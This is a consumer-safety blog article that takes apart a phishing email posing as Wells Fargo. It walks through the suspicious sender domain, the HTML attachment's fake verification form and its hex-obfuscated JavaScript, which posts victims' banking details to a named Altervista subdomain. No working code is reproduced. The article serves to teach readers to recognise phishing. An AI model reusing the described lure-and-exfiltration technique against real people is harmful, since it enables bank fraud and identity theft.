fishAnatomy of a Phish

One of our visitors at TheDailyScam.com recently forwarded an email to us that appeared to be from Wells Fargo bank.  However, the sender felt that the email was very suspicious.  The email came with an attached file named “Case ID-40431.html.”  The email, and attached html file were a very clever and extremely dangerous phishing scam.  A phishing scam is a scam in which a fake website has been set up to appear like a real website for a financial institution or some other service such as Apple account. The scammer hopes to trick the email recipient into entering very personal information such as bank account or Apple ID login information.

 

In this article, we’ll take this particular scam apart and expose it in layers starting with the simplest parts and ending with the more complex ones.  Our hope is that everyone reading this article will gain some insite into these types of scams and avoid becoming a victim themselves.

 

Let’s start with the email that arrived from Wells Fargo:

Phish anatomy 1 wells fargo email

The woman who received this email does have a Wells Fargo bank account but was suspicious because the sender’s email address contained conflicting information. Though the sender is identified as “Wells Fargo,” the email came from a domain named “surveillancesystem.com.” And what’s up with that replyto@yahoo.com? It also made our recipient suspicious.  If you enter “surveillancesystem.com” into Google, you’ll learn that Google can find no such domain name. (Not to be confused with surveillancesystemS.com) Even if the domain surveillancesystem.com DID exist, it has nothing to do with Wellsfargo Bank!

The email asked the recipient to download the attached file “Case ID-40431.html.” Any file ending in html or htm is a web document. This means that it will engage your web browser to carry out whatever instructions are written into the file, a very risky thing to do in these circumstances. We first inspected this file using an html editor. Buried in the many lines of code in this file we found several suspicious lines including two javascripts and a link to a URL shortening service. (Javascript is a computer language that is used to create interactive effects on web pages.) (To learn about the inherent risks of clicking “shortened links” and what they are, visit our article on the risks of shortened URLs.

We’re reminded of the metaphor “curiosity killed the cat.”  We certainly didn’t want to be that cat so we opened a web browser first and turned off javascript on that browser.  In fact, we severely limited anything that the browser could do.  Then we opened the html file with that limited browser and this is what we saw…

Phish anatomy wells fargo page 2

What we found was a very long web page filled with more than a hundred legitimate links to Wells Fargo bank.  However, in the bottom third of the web page was a request to provide the necessary information to complete the “verification process” and unrestrict our restricted bank account.  This is what the scammers wanted from us…

Phish anatomy 3 Phish anatomy 4 Phish anatomy 5

Can you imagine providing this information to thieves?!  You can pretty well kiss your dollars goodbye and lots more, like your identity!   Of course we wondered where this information was going to be sent so we explored the html code and found the following unusual javascript in the code for the attached file:

Phish anatomy javascript 6

What makes this a bit unusual is that someone took the effort to write this in hexadecimal code instead of plain readable characters (called ASCI characters) as if they wanted to hide the intention of this script.  We copied the hexadecimal code and pasted it into an online decoder and learned something very important and revealing. [Decoder: http://meyerweb.com/eric/tools/dencoder/]

Phish anatomy decoded 7

The decoded information tells us that once someone has entered all their personal data into the file’s various forms and clicked continue, his or her information will be submitted to a website called “geryhoops.altervisita.org.”  Sound like Wells Fargo to you yet?  And it gets worse.  We asked the Zulu URL Risk Analyzer (http://zulu.zscaler.com/) to look at this site and Zulu told us that the site is “Suspicious” and hosted in Germany.  Zulu also flagged several javascripts as suspicious.  We were glad to have turned off javascript! (The Zulu URL Risk Analyzer is one of the best tools we have found for determining whether or not a link is malicious or benign.  Though it is good, it isn’t perfect.)

Phish anatomy altervista zulu score 8

We entered the domain, “altervista.org” into a Google search field to see what Google might tell us and we weren’t the least bit surprised to see many Google returns referring to this domain as a known phishing site.

Phish anatomy Google search altervista 9

Clean-MX.com even had a long list of identified phishing attacks listed as coming from various subdomains of the website Altervista.org.  (The subdomain is the name that appears in front of “altervista.org” and separated by a period.)

Phish anatomy phish site list 10

Like we said at the beginning of this article… this was a very, very dangerous phishing email.  This kind of phishing trick can cost someone everything he or she has in bank accounts, including identity theft and a ruined credit history.

 

Just delete.  Safe surfing!